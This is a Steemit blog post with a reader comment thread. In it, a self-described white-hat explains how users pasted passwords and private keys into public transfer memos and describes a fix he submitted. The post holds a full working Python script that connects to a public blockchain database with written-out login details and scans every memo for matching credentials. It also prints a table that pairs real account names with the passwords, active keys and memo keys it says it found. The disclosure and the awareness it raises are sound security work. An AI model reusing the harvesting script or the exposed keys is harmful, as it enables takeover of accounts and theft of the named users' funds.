Actually, we - @noisy & @lukmarcus - have gained access to 9 passwords, 2 private active keys and 64 private memo keys, but first, TL;DR:
<p dir="auto"><br /> <center>Image credits: <a href="https://null-byte.wonderhowto.com/news/study-for-white-hat-hacker-associate-certification-cwa-0165138/" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">source<span><img src="https://images.hive.blog/768x0/https://img.wonderhowto.com/img/53/47/63580328862338/0/study-for-white-hat-hacker-associate-certification-cwa.1280x600.jpg" srcset="https://images.hive.blog/768x0/https://img.wonderhowto.com/img/53/47/63580328862338/0/study-for-white-hat-hacker-associate-certification-cwa.1280x600.jpg 1x, https://images.hive.blog/1536x0/https://img.wonderhowto.com/img/53/47/63580328862338/0/study-for-white-hat-hacker-associate-certification-cwa.1280x600.jpg 2x" /> <h1>TL;DR; <ul> <li>no, we didn’t hack Steem blockchain <li>no, we didn’t hack steemit.com website or any other service build on top of Steem <li>we didn't steal those funds, despite the fact that we could easily do that <ul> <li>we changed passwords of all compromised accounts <li>we transferred all funds into saving accounts of each account (to show, that we do not want to take them) <li>the problem is with 2 accounts to which we have active keys. We cannot change password without old password or owner key, so we make sure, that those funds are safe on saving accounts. <li><strong>what we did, we exploited a flaw in design of steemit website, which caused that many users made exactly the same fatal mistake: <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVhNiEuBhNf1xE4NEufs7R3ZU5oPM6gQt39oQVu6mECLZ/Selection_999(152).png" alt="Selection_999(152).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVhNiEuBhNf1xE4NEufs7R3ZU5oPM6gQt39oQVu6mECLZ/Selection_999(152).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVhNiEuBhNf1xE4NEufs7R3ZU5oPM6gQt39oQVu6mECLZ/Selection_999(152).png 2x" /> <h1>What actually did happen? <p dir="auto">Few days ago I noticed in my cousin's wallet, that he accidentally pasted his own password into wrong field (a memo field), when he made a transfer. I warned him, so he changed his password. But this got me thinking... if he could make such mistake, anyone could do that! And unfortunately I wasn't wrong :( <p dir="auto">So I wrote a script, which analyze all transfers in Steem history, which checked each memo, whether it is a match with current public keys of a user: <pre><code>import csv import pymssql import json from steembase.account import PrivateKey, PasswordKey from multiprocessing import Process, Queue, Manager WORKERS = 8 q = ''' SELECT TxTransfers.*, sender.owner sender_owner, sender.active sender_active, sender.posting sender_posting, sender.memo_key sender_memo_key, receiver.owner receiver_, receiver.active receiver_active, receiver.posting receiver_posting, receiver.memo_key receiver_memo_key FROM TxTransfers INNER JOIN Accounts as sender ON TxTransfers."from" = sender.name INNER JOIN Accounts as receiver ON TxTransfers."to" = receiver.name WHERE TxTransfers.type = 'transfer' AND TxTransfers.memo != ''; ''' def get_keys(field): return [key_auth[0] for key_auth in json.loads(field)['key_auths']] def get_public_keys_from_fields(public_keys_by_account, account_name, owner_field, active_field, posting_field, memo_key_field): if account_name not in public_keys_by_account: public_keys_by_account[account_name] = { 'owner': get_keys(owner_field), 'active': get_keys(active_field), 'posting': get_keys(posting_field), 'memo': [memo_key_field], } return public_keys_by_account[account_name] def get_public_key_from_password(shared_dict, account_name, password): if account_name + password not in shared_dict: shared_dict[account_name + password] = str( PasswordKey(account_name, password, 'owner').get_private_key().pubkey) return shared_dict[account_name + password] def get_public_key_from_private(shared_dict, priv_key): if priv_key not in shared_dict: shared_dict[priv_key] = str(PrivateKey(priv_key).pubkey) return shared_dict[priv_key] def worker( pid, transactions_queue, results_queue, public_keys_from_passwords, public_keys_from_private_keys ): print('[{}] worker started'.format(pid)) while not transactions_queue.empty(): i, account_name, public_keys, memo = transactions_queue.get() print('[{}][{}] Testing "{}" against "{}"'.format(i, pid, account_name, memo)) public_owner_key = get_public_key_from_password(public_keys_from_passwords, account_name, memo) if public_owner_key in public_keys['owner']: print("[{}] Gotcha! Found main password for '{}' account: {}".format(pid, account_name, memo)) results_queue.put((account_name, 'password', memo,)) else: try: some_public_key = get_public_key_from_private(public_keys_from_private_keys, memo) for role in ['posting', 'active', 'owner', 'memo']: for key in public_keys[role]: if key == some_public_key: print( "[{}] Gotcha! Found private {} key for '{}' account: {}".format( pid, role, account_name, memo ) ) results_queue.put((account_name, role, memo,)) except AssertionError: print('[{}] AssertionError: {}'.format(pid, memo)) continue except ValueError as e: if str(e) == 'Error loading Base58 object': continue elif str(e) == 'Odd-length string': continue print('[{}] worker ended'.format(pid)) def save_results(results_queue): tmp = set() with open('results.csv', 'w+') as file: writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\") writer.writerow(['account', 'type', 'memo']) while True: result = results_queue.get() if result == 'kill': break if result not in tmp: writer.writerow(result) file.flush() tmp.add(result) def main(): manager = Manager() existing_public_keys_by_account = {} public_keys_generated_from_potential_passwords = manager.dict() public_keys_generated_from_potential_private_keys = manager.dict() transactions = Queue() results = Queue() conn = pymssql.connect('sql.steemsql.com', 'steemit', 'steemit', 'DBSteem') cursor = conn.cursor() cursor.execute(q) with open('transactions.csv', 'w+') as file: writer = csv.writer(file, quotechar="\"", delimiter=";", escapechar="\\") writer.writerow(( 'id', 'tx_id', 'type', 'from', 'to', 'amount', 'amount_symbol', 'memo', 'request_id', 'timestamp', 'sender_owner', 'sender_active', 'sender_posting', 'sender_memo_key', 'receiver_owner', 'receiver_active', 'receiver_posting', 'receiver_memo_key') ) for row in cursor: print('.', end='') writer.writerow([str(item).replace('\r\n', '') for item in row]) with open('transactions.csv', 'r') as file: reader = csv.reader(file, quotechar="\"", delimiter=";", escapechar="\\") next(reader) # skipping the header for i, ( id_, tx_id, type_, from_, to_, amount, amount_symbol, memo, request_id, timestamp, sender_owner, sender_active, sender_posting, sender_memo_key, receiver_owner, receiver_active, receiver_posting, receiver_memo_key ) in enumerate(reader): sender_keys = get_public_keys_from_fields( existing_public_keys_by_account, from_, sender_owner, sender_active, sender_posting, sender_memo_key ) receiver_keys = get_public_keys_from_fields( existing_public_keys_by_account, to_, receiver_owner, receiver_active, receiver_posting, receiver_memo_key ) transactions.put((i, from_, sender_keys, memo)) transactions.put((i, to_, receiver_keys, memo)) processes = [] for i in range(WORKERS): p = Process(target=worker, args=( i, transactions, results, public_keys_generated_from_potential_passwords, public_keys_generated_from_potential_private_keys )) p.start() processes.append(p) listener = Process(target=save_results, args=(results,)) listener.start() for p in processes: p.join() results.put('kill') listener.join() print("end") if __name__ == '__main__': main() <h2>which returned: <div class="table-responsive"><table> <thead> <tr><th>account<th>type<th>memo <tbody> <tr><td>dunja<td>password<td>hurehurehure1234 <tr><td>anwen-meditates<td>password<td>P5Kk17eRvytzkRzzngp1CdVbQvRqFUq8wrvw8SqNdcZwXot2JRXA <tr><td>jakethedog<td>password<td>P5JEo9aSW6CAF6apUsMbxqSe6r991T5G35uXcoYMP1PmifBRqX87 <tr><td>miketr<td>password<td>P5JEZWqSV28XAGrwMXn5G2Sx4dADvS5mz4DrrtjoraY8nmB59Rrb <tr><td>blacktiger<td>password<td>P5HufQw3V442c4DREjUL4Ed4fQ41VzBhPtn5SkCBDJ25tuRFg1UC <tr><td>quetzal<td>password<td>P5KC2JAHPyuA5tBn4K8PxoLuwXqHx51GHy7tG3gD7DupKH8NxqZz <tr><td>tieuthuong<td>password<td>P5HybN5mguE6G2QB4BVKbreexEtxJD84veHcz4s3L9R8JLQ6m85V <tr><td>aubreyfox<td>password<td>P5J5wS2gkQBv3U6WPgHU9gUTitbWE4V5CKYeEhZGVa3VGgkzQU2p <tr><td>virtualgrowth<td>password<td>P5Kifqmdm38WPHpn2FUigLbhfD7FatHAHfcuRU5xSi16AFJFex3r <tr><td>trump<td>active<td>5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 <tr><td>amrsaeed<td>active<td>5JqaDeu2s3BsG9QYenpz2xjLfg3qdaeWhXduYNUSmK7KWAywx93 <tr><td>trump<td>memo<td>5KWkAdBieGJ8TwrpudKjJ3txTGKdjKSBHPgjiH1RGgFRWXp8uM9 <tr><td>alao<td>memo<td>5JBGwoooi1gEUXBhu6up1qWdsKKKG1TEakQwaBNMb95dup5f9xh <tr><td>athleteyoga<td>memo<td>5KU2dcxLpSCJZ4SB8eBqUJs2PCEuwfx7w2XYCUmcnLqgdHHqjq2 <tr><td>beeridiculous<td>memo<td>5KHkKyHpxDBuuKGt5QwTbb42bxmMUo1Xk9efBKU7wUoRed2Ak8z <tr><td>romanskv<td>memo<td>5JzZ1BUHGrYrmu9Kms5mFK2nhQPFSxKHXp5mtcfMrQWioEgJTfE <tr><td>blockiechain<td>memo<td>5JJZPu2z6DfhyGFsm9b458wff8H168f4yiAidbsWq55YSbFLd3a <tr><td>bloodhound<td>memo<td>5JQZo8QDuQ1eDqsgMnVHg1ujqYNUTEDV4KYZyeSdbzSAbXMsSuV <tr><td>bryguy<td>memo<td>5JdJHDcgeqyaHEgmyTbob221RUvttqyRVVPViAMzuq4hWJKw6sa <tr><td>churchsoftware<td>memo<td>5KB3B3rHxvvaR3C2gfNyKkkReqdfbsjPs4AZ8ceiiR4B49oCDmJ <tr><td>chuckles<td>memo<td>5KWf41ixGbPMpAxNhe47jtTVbyAi9Su4mZrHaVanYP2rQWoPUUk <tr><td>coincravings<td>memo<td>5Jp6RJ71B824qc2cHXLPNYHZPD1BgxE2rFMyEpDszjqussW5iSA <tr><td>colombiana<td>memo<td>5JaewDd6gw4AjXGhABCdZk2FHrwxHJnJDWZmkUzJYuny6rarbf3 <tr><td>cryptoeasy<td>memo<td>5JNv71NgwCRUDAQu1NP67TDRVHKmRnnGLRfNFMwAKS8fTMLvLkQ <tr><td>datkrazykid<td>memo<td>5JbiRrFrv9GLMjjPYZA8K7AWxAXQThs5AefWj1JgqjzMS2jLdng <tr><td>dollarvigilante<td>memo<td>5Hqzx26rSmSJ2o5VB8gicf3F2Q6BU35n1nMNajcEmDxMietvUVx <tr><td>dethie<td>memo<td>5K3BBi9pETRGG7KkS7VDrWY7exDCCi315prn2Mf9dTuR9vCejEH <tr><td>francoisstrydom<td>memo<td>5Jkw1HdHc1ucwTosaqhXVAhyG848d1ZJprQsrwP1UEctazBvU3D <tr><td>farinspace<td>memo<td>5JMckr9WkVbRZdbeMwQ6CNwTWBfrp4vTBy9K1YTJyZ76XBbRgZW <tr><td>golgappas<td>memo<td>5K8zaCwcXWjQPjs6JGH896pGb6jENyMNU19g1hSsYXW1X2Dour1 <tr><td>goldrush<td>memo<td>5JKCSn4xwHHCTBNy1MYJgbLDpYGR434A43gUvGPCVJPAs49GMvX <tr><td>hithere<td>memo<td>5HxdErB3wPUDQKWEcjNBBWLpB1uJ8aMrY1tK5ZA1k56MqmTtT31 <tr><td>iaco<td>memo<td>5JTYW5HfPJJX47VRT1Cq9Nz8aSruWKhETiD6oo9GPJNteQ5RPke <tr><td>inphinitbit<td>memo<td>5J9uWL39vDYgEosscgxEziYQ2ybPbxM5e9sPkzTxgqTgNYC7Mx7 <tr><td>jellos<td>memo<td>5JYXarzjE5afBtHcjhvdUcczrqCsfUEyxVRTKAFyDdjGatkTNNy <tr><td>kakradetome<td>memo<td>5JuMh7FikJ1UVpUauF3J1e7MHj562z8Zmnp29pauVgPw3A4SgYC <tr><td>kingofdew<td>memo<td>5HrSQ9yJizKCbDAu2Di9PnSuMPwMuNQCiKRdBUqzHFZySWQmtbL <tr><td>malyshew1973<td>memo<td>5KbD93C9XLGL4Aa4ncSpRnXCVuSRTvRRP6gANwHPbUeWBaPf4Eq <tr><td>leesmoketree<td>memo<td>5Kctn9BvtxB3CXzzX4GMcmLygq42LqisCZr5MAy7VYPzvwX5o7u <tr><td>lichtblick<td>memo<td>5J9jkRijjAn8o8DXt8R1ujSZHtahevVCw8CGzPEjnvCEsqkXjHy <tr><td>lopezro<td>memo<td>5K6rmYGbHaGsAyGLpQMNupWcmjQFHvjX2GtYyCrC3KMgWAWcNci <tr><td>lostnuggett<td>memo<td>5JEKwfrtSEFvw8P8qnWyDhfxnQTRB5Vn2WxwW3tE4gL4pZiwPcQ <tr><td>luani<td>memo<td>5Jo7p98JCpTiH1q9kVC81etym4QSHRRpLDvxumRW7BXouDu8Yfd <tr><td>mama-c<td>memo<td>5HqAhZBvbBJKVWJ1tsrg7xnS1dvNNyxBoHzp8Snvp9C6Uawx66x <tr><td>marionjoe<td>memo<td>5KUpMmkx6hrPanwKzUvrHTonLDQkZAoiJwESogHAMSeuFsB1Lqc <tr><td>maxfuchs<td>memo<td>5J9CvSGNyLBgUwhKtsTWCqTddbDZJ4tFrVSyWFzDstsQiG9spPe <tr><td>mkultra87f<td>memo<td>5J8mDeubzJwEtHsbPzfUCVetNgPrVgQVHUBQDySH7v1qSS44DBf <tr><td>mrsgreen<td>memo<td>5JyAaFEdEriRLpQ9uEXGoeNyHpw1TscqN6VP6iNjpoFbA8JCrMP <tr><td>nathanhollis<td>memo<td>5Kk1N4nxMPbqVuJCVt3MUjz5dvJR716cUAdf6c3kToqzMqT8rRu <tr><td>murat<td>memo<td>5K8R2J7xiLRN3HWdAy5Zym4taE74o9DWF8FV82HHFrqNUZDzdxW <tr><td>nikolad<td>memo<td>5KdeDUj92w2HXsLH6V6SpNGPAeyBtJEU5jVoqZyjaHDkE39AkzF <tr><td>niliano<td>memo<td>5KCPgZBnLziZC88e44j8GxK11XYdpQyo8WFxocBH24jAhEnVN6z <tr><td>norbu<td>memo<td>5J5HyEwx54MwKW8gpsSBzvwAweHRjH11CXs85RCNWSooyPYRaeh <tr><td>onighost<td>memo<td>5HwsjHgWMmJSLdiVgdxbRWqyvFtsKRC3Mk2tDzkpW4293ssTa6V <tr><td>pinkisland<td>memo<td>5JAymGCYWxhojoyQsfAC4x619nq5vkcQBhMWjEZHwiitodBYFV5 <tr><td>rawmeen<td>memo<td>5JnLMoPRry2n361tPxQq7MYy16tn5PuT2PmsP1FLrRGJsp1Vfem <tr><td>qamarpinkpanda<td>memo<td>5K4SgN4tps3HRiyy49m5rfWNCZmyBVYv7eFF3CTRkcJJPQsExTb <tr><td>richarddean<td>memo<td>5JPPUidz7rPN6VPHFJQbjnh8a3JQCDzP7fJSt93EQkUeLr3gmJJ <tr><td>saramiller<td>memo<td>5K8My6Afbi6ff5CeFByB5e9zQG4QUX4MtMRHs7Ux9Tvu4ZSP7H4 <tr><td>slimjim<td>memo<td>5HtkqVNSBj4kf6tyyyNPBgpnbgkrvATM1wBYY4mkNfxs9xiYHbv <tr><td>smisi<td>memo<td>5Hsre3qaCDBcxwGiig5qFc65dwf2NfAssUUTXfCWFmbhbxPz7bL <tr><td>sraseef<td>memo<td>5K558SavQVHXnKn6k8CoKe28T3FAmmAtRJuCMjpwdSwR6sT9rYq <tr><td>steemshop<td>memo<td>5JRoiSJw18Vj3rGt5mrd4JeuxL1Wb1YpGyFDQu9pFrKmckr6kTu <tr><td>surpriseattack<td>memo<td>5K8Be3nW33Lc5vqRUJx3xmoLFnMMmJPMthYHb16i7R2gwFTJqh3 <tr><td>tee-em<td>memo<td>5KPT9Nhtho3qaAFkGQ4zqy7Dae1729WdYM5wL3UPyKVuTauonif <tr><td>theofphotography<td>memo<td>5KRJ9qt8E9o6KXFhfyW7PJH7sDsmSBVaBeC8SmLR5LmReQii44Y <tr><td>thunderberry<td>memo<td>5JxtXr2cMTkbU37CDtPyFdGuTT9fPceNemwnJDsqAdMoV5msLEP <tr><td>tomino<td>memo<td>5JPBiMwfrqTdgZhW16LjdeMZv29gtKQC4eb4jyVTpk2Vvx5MHde <tr><td>worldclassplayer<td>memo<td>5JQBm8pn5vwChYdoxx3tJw6dkBFeQpKBKia5roB9DqXZMoFdF4h <tr><td>writemore<td>memo<td>5JJTZpTEvw4C7cnU7Q9NfzUnXSYqwYLLxkP7B3c39Z82Uwzj14d <tr><td>wthomas<td>memo<td>5HwbsX4CTKtCJLH8QYuVBTvCbJYQwwFDiCCKy99uNLCHpoazo6N <tr><td>walcot<td>memo<td>5KJjeTJGM8FjjDpj8mHRFpjae5SeSZ9Y8CGaBJC7VqFUGR25Qa6 <tr><td>vovaha<td>memo<td>5J9Wxf1Xz1hXvMd7ubXHNZXhFoF1yhQT3GSHNVmRNXERCnBZJ7e <h1>The fix <p dir="auto">I created and submitted a fix, to prevent such mistakes in a future: <p dir="auto"><span><a href="https://github.com/steemit/condenser/pull/1464" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://github.com/steemit/condenser/pull/1464 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png" alt="Selection_999(154).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmT3M7PGgQACJfESby7nFSjAZTsP72ovsJvsYCYon62QTa/Selection_999(154).png 2x" /> <h1>FAQ: <h2>My Account was hacked - what I should do? <p dir="auto">Actually, I cannot reach you on steemit.chat or discord to give you your new generated password. Why is that? Because no one can have a certainty, that you actually have the same login on different service. I do not want to risk giving access to your account to someone who just pretend to be you. <p dir="auto"><span>You should go to: <a href="https://steemit.com/recover_account_step_1" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://steemit.com/recover_account_step_1 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png" alt="Selection_999(155).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYZ3qNcsT5j6UKdxDorFPpz5z9XKSe1rTjXtXdqERDnSo/Selection_999(155).png 2x" /> <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png" alt="Selection_999(156).png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmY7Xd4G1wAmxrVb1rR1m6dhKE9u54tc3mnZE5X4dA7sC7/Selection_999(156).png 2x" /> <p dir="auto">and you will be able to restore access to your account with a help of steemit and your email address. <h3>Important <p dir="auto"><center><strong>According to code in Steem blockchain, you can do that only during first 30 days after password was changed. <h2>My account is on a list, but <em>only private memo key was exposed. What should I do? <p dir="auto">You should change your password immediately. <p dir="auto">You can do that on: <code>https://steemit.com/@<your_login>/password <p dir="auto">Right now (according to my knowledge) exposed memo key do not make a damage, but it was said few times, that those private keys in the future might be be used to encrypt private messages. Exposed private memo key would mean, that anyone could read your private messages. You don't want that, right? <h1>What next? <p dir="auto">You can expect from me in very near future few posts about security (for total newbies and for developers): <ul> <li>How private and public keys works. What is the difference between password and a private key <li>Why Steemit didn't detect that I checked passwords of 183388 users <li>Very detail explanation of how passwords are stored by steemit in your browser, and why it is secure <li>How to set own password, which is not generated by Steemit <li>How to make you account on Steemit more secure, by using only private posting key for every-day use <p dir="auto">Make sure, you follow <a href="http://steemit.com/@noisy" target="_blank" rel="noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">me, to learn more about how to keep your fortune earned on Steemit more secure :)
nice work, noisy! with community heroes like you and @lukmarcus, we are continually becoming stronger than ever
Would be great if you could have someone acknowledge these github issues...
https://github.com/steemit/condenser/issues/1459
Would also be good if we could get some sort of 2 FA option on the wallet.
would Trezor integration be possible?
https://doc.satoshilabs.com/trezor-faq/overview.html#which-coins-are-currently-supported
Not sure. I haven't really tried hardware wallets yet but it is something I need to look into.
Nice idea!
2FA is essential in this space... I agree
2 FA cannot be created for blockchain-based system. There would have to be email/sms on blockchain
OK - is there some other solution you can think of?
user should never use password on steemit. They should use only private posting key. I am writing article about that as we speak...
Yes for sure but is there any other way to increase security?
it is not secure yet. Account can be hacked
Spotted this a month ago but thought a post will be sufficient to get the word out. i am not so techy, so my post is mostly my voice. Steemit is letting me peer into more and more things! I have started to learn some coding fundamentals. i gave my novice tip as possible fixes within my post, hoping it helps! https://steemit.com/steemit/@surpassinggoogle/this-could-be-the-easiest-way-to-lose-your-steemit-account-or-password-and-possible-fix-steemit-inc-take-a-look
Steemit is the best!
i'm addicted to steemit.
I just started tonight. Comments like these give me... hope? Lol! :D
We just try to walk a German blogger throught the recovery, who "lost" his account in this (amazing and useful ) hack. Unfortunately it isn´t possible to recover an account by facebook. What is the alternative? Can there be a fix?
@noisy @ned
THX
which account?
@miketr Seems @Twinner already talked to you and mike can post and vote again... THX!
💖💖💖💖 💖💖💖💖
No doubt. loool I love this meme bdw
I wish more people understood the value of a good meme
meme's get undervalued by people....so sad. I made a post about meme's in fact
cool baby
I agree;) See if those minds can come up with a solution to a problem that WE ARE ALL ABOUT TO FACE involving capital gains tax. Id love to see a clever work around/strategy for the problem below:
Need some critical thinkers. https://steemit.com/money/@threat08/avoiding-capital-gains-tax-15-avg-when-cashing-out-your-bitcoin-into-fiat-theoretically-of-course
I hate taxes
@noisy & @lukmarcus You guys are awesome!!
Thanks!
Wao this is quite interesting
Thanks, for your efforts!
Detecting these things early, and prevent future events will grow the trust in this platform!!!
couldn't agree more!
Go STEEM! ;) The way u handle thinks like this are awsome, thanks for the platform and some freedom guys!
I am not a coder, so I can only spread the idea. Hope someone will pick it up and create the possibility to secure a Steemit account for 100%Good job idd! Last month I wrote a request for the programmers in the Steemit community: https://steemit.com/hardwarewallet/@michiel/hardware-wallets-new-and-incredible-interesting-devices-idea-for-steemit
We're like two good cops :)
Yes, this great work for the community!!
I'm amazed at how smart our community is. This is unreal!!
Thanks guys @noisy & @lukmarcus!
Great work
i think yes
I love the way steemit is doing thing!
We have to be diligent, both personally and as a community.
Thanks for your great work @noisy and @lukmarcus! Much thanks for helping everyone know how to do Steemit life a little better and safer.
Great job. Glad it was a white hatter that got his hands on this first! Your a good person and I'm sure some people will be happy you won't be taking their funds!
Yea, this is guy is with not standard heart beating :)
Thank you for being ethical and responsible in this case.
BTW, I don't think that this is
There's already "This Memo is Public" note there.
This is rather Problem Between Keyboard and Computer type of bug. You can't prevent users from hurting themselves. If one note didn't help for all, adding second and third probably would reduce risks a bit, but there would be still those who would ignore it.
Anyway, good work.
Technically you are right, but still I believe, that if so many users are making exactly the same mistake... something is wrong. Guys like @dollarvigilante (a guy who have the biggest number of followers on Steemit) exposed his private memo key, @virtualgrowth and my cousin - @lukmarcus accidentally exposed own passwords - those guys are experts about Steem and Steemit when you compare them to average Joe.
I believe, that we can do things a little bit better, thats why I provided a pull request with a fix :)
I didn't... I haven't been hacked.
there are 4 pair of keys: active, owner, posting and memo. Every pair has public key and private key. Under any circumstances, you should never expose any of your private keys.
As I wrote in a post, right now exposing a private memo key is not very dangerous. But it was said few times, that in the future memo-keys will be used to encrypt and decrypt private messages. So basically every your conversation encrypted with your memo-key would be basically public for everyone who poses your private memo key.
Also... even right now everyone with your private memo key could try do some kind of social-engineering atack, by pretending that attacker is you (because technically speaking only you should be able to sign messaged with your private key).
So.. no, you account was not hacked right now, but with private memo key exposed, your account could be attacked in a moment when private-memo-keys would gain some new role in Steem ecosystem.
I see, ok thanks!
Jeff, take a break from walking your dogs and setup your avatar. Por favor.
LOL.
ouch, you could've mentioned that in your live show yesterday !
It took a whole day to get account access.
Anyways cheers !
Thanks so much for explaining the ramifications. I'll make sure to be extra vigilant when I do transfers. This is something I can see myself accidentally doing, and I'd rather avoid the headache.
You did Steemit a massive favor Noisy! It won't be forgotten! :)
Ale swietna robota! Ja tez raz prawie wkleilem w zle miejsce przy momencie mojej adhd nieuwagi. Dobrze ze nie ma mnie na liscie :-)
When you scroll through the names looking for yours....
same :D
lmfao! this so me right now.
haha I was definitely doing this
Haha!
Haha did the same even though I'm new user with nothing much too lose unfortunately ^^
It may be an error 40, but it still should be easy for steemit website to check if the memo contains an account key (or what likely is one) and give an error message for that.
Why keep an error source open just because YOU would never make that error (which of course say at least 50% of those who make it).
Sure, I'm not saying that we shouldn't try to reduce those chances. Appropriate modification is on its way.
Steem Super HeroPlease @noisy be at Lisbon's Steemfest, i want to shake your hand if i could make it there😊......
I noticed this possibility and gave some novice tips in my post from a month ago:
https://steemit.com/steemit/@surpassinggoogle/this-could-be-the-easiest-way-to-lose-your-steemit-account-or-password-and-possible-fix-steemit-inc-take-a-look
Thank you Noisy. Great work.
Amazing work! :) best type of hacking, as you can keep the rewards with a clean conscience and gain people's trust and respect! :) well done :) followed and upvoted for the hard work!
Krzysztof love your use of ethical hacking here to help fix a bug and thank you for sharing the accounts to help us know if we need to change our passwords now!
White hattin' like a boss!
I think this is the first time I run directly into whitehat hackers. And thats darn cool. :)
Well done and thank you for being ethical about this, its a miracle nobody else beat you to it and stole the funds. @dollarvigilante should be especially grateful, this could've been way worse.
wonder what's gonna be dollarvigilante reaction to this...priceless.
I haven't been hacked, that's my response.
Hahhaha...and still remains your response.
My question indeed!
Just curious, why call out to dollarvigilante??
Thanks for alerting us to this common mistake. Can see a newbie like me making it if you hadn't warned.
Hopefully the reward you get from this post will be big :) Hackers better think long term, joining the good guy side pays off more IF you know how to do it right.
We, as a community have all the power we need to make sure the good guys are properly rewarded. I threw my vote on this article and plan to resteem it.
It would be really nice if the wallet gave a newbie explanation by each "key" in the wallet. I am confused by the current messages. I lean towards being afraid to give any key to anyone, but I totally see where the confusion comes in.
Thanks for pointing out the possible mistake that we could made. I'm new to Steemit and this post is really useful to me and to remind me not to do the same mistake. Thanks again!
Yeah I figured something like this could happen. I ussually copy some random text after I log in to Steemit so the password is not in the clipboard anymore, and thus can't paste it somewhere by mistake.
the problem is... that if you are making a transfer, very often you are prompted one more time about password (because actually password is not saved if you are moving to next page which is outside of a wallet)
Yes, you are right. I need to be extra careful when I do transfers. Thanks! Hopefully Steemit may find a way to make this better. Maybe by adding some PIN number or something, that is not used to login, but only for transfers, and make it not work unless you are already logged in to Steemit (PIN would not be blockchain based). Or something.
Nicely done @noisy! I'm wondering if there was someone else instead of you, what he would be done? Thanks for sharing this, and maybe those people have learned their lesson!
Well done on this. I'm going to promote this a little, it's important
I resteemed to help some too.
Omg,really thanks for your work done. What you really did is a great job, it's a ethical hacking! Hope the steemit team will really treat it serious and amend the code accordingly to solve the problem. Thanks for your great job guys!
Nice work keeping people safe and secure. We need more benevolent "hackers" like you in this world.
Whitehats: Protecting people from themselves since 1970-01-01T00:00:00Z
And doing it till 2069-12-32 23:59:59!
lool. Someone has a time machine
"All the way to...the year 2000"
hahah yeah... the official version looks good.
Haha, you got the DollarVigilante. He better send you a gift basket this Christmas, I would think his account is LARGE!
He didn't actually... I haven't been hacked. I am waiting to hear his response.
Good to hear, I appreciate the White Hats doing their testing though!
Upvoted
Thanks for your great work!
Your efforts make our community more security and stronger.@noisy & @lukmarcus
And I also write an article about it for Chinese user.
🔓 [Security Alert] You may leak your steemit password (key) by accident / 安全警示,你可能不经意就泄露了你的steemit 密码
This is amazing to see how you did this on highlighting the mistakes made on steemit. Maybe steemit should add detecting it's a private key on memo?
we are merging the PRs now :)
It's clear this mistake can be made way too easily, even by those who are generally more careful and/or experienced (cough cough). So I'm glad to hear noisy's fix is in progress. Although in the future (hopefully not too distant), it would be great if memos were private!
is there a plan for things like a "will" might include...for lost credits? IE, if someone dies or goes bye bye where and how can we transfer bitcoins to our next gen? or in this case steem.
before I went public with this, I already prepared a fix which is doing exactly this ;)
https://github.com/steemit/condenser/pull/1464
Damn noisy, you deserve all the respect!
WoW, this topic woke me up better than any Cuban cup of coffee could.
Thanks for posting!
I got excited and nervous when I saw the title. As a newbie - I am still learning how to ensure that my account is secure. Thanks so much for sharing this information. Everyone should be aware of this. This post is so important. How can this post get more publicity> That is one feature of Steemit that I still wonder about. Was surprised to see Dollar Vigilante on the list. Just goes to show anyone can make an error. Thanks so much. Upvoted and resteeemed
Thankfully I and my followers are not on that list. Awesome work! Don't know that those who have to change passwords will agree, but better you than someone else IMHO. Upvoted Resteemed :)
Have a great day.
This reminds me of how annoying it is when I accidentally paste a password into a google search or something stupid like that.
I then have to go through the process of changing that accounts password to recover from my error.
Easy mistakes to make.
Wow...grateful you're using your powers for good and not evil! That's not a list I want to be on; thankfully only my private key was exposed, and super duper thankfully you seem to be an honorable gent. Excellent example to bring awareness to cyber security and more importantly to decent human values 👏 👏 👏
Thank you for looking out for the community. This could happen to anyone. But luckily there was a good (and skillful) person there to help.
White Hats off to you!!!!
Good job.
Stirling work chaps !! that's community for you. I applaud you and am sending 10% of my steem dollars to you in thanks on behalf of the community. That's a very useful service and great to know steemit has it's own warlocks to keep out the wolves !!
Thank you, it's really great that you caught this, created a solution and shared. I'm new and am a lot more clear on the importance of security from your post. Upvoted and following you to learn more...
@noisy WOW great work man! First off your due diligence on this matter is extremely commendable and I think on behalf of all Steemians seeing this not only makes us weary, but now educated on whats really going on. Thank you for this.
Have you spoke to anyone in the administration of Steemit regarding this matter?
Thanks! Upvoted, reblogged and now I will follow!
-@bostonrob
Excellent work, thanks for pointing this out.
This was pretty evil genius of you.
Thank you so much @noisy & @lukmarcus for your honest work! Had me a little nervous there for a second!
You are a really good and clever guy! I just informed two known accounts to read your post.
great work and great ethical and responsible actions.
Damn noisy this is smart and generous at the same time
Great work brother
UPVOTED
heroes!!!!
Nice catch!
Wow, thanks for finding this potentially devastating "bug"!!! Good job @noisy!
I like your code, fellow python programmer! lol.. People, dont put the priv key in your memo.... lol
Would love my
own pass
+word not a generated one.
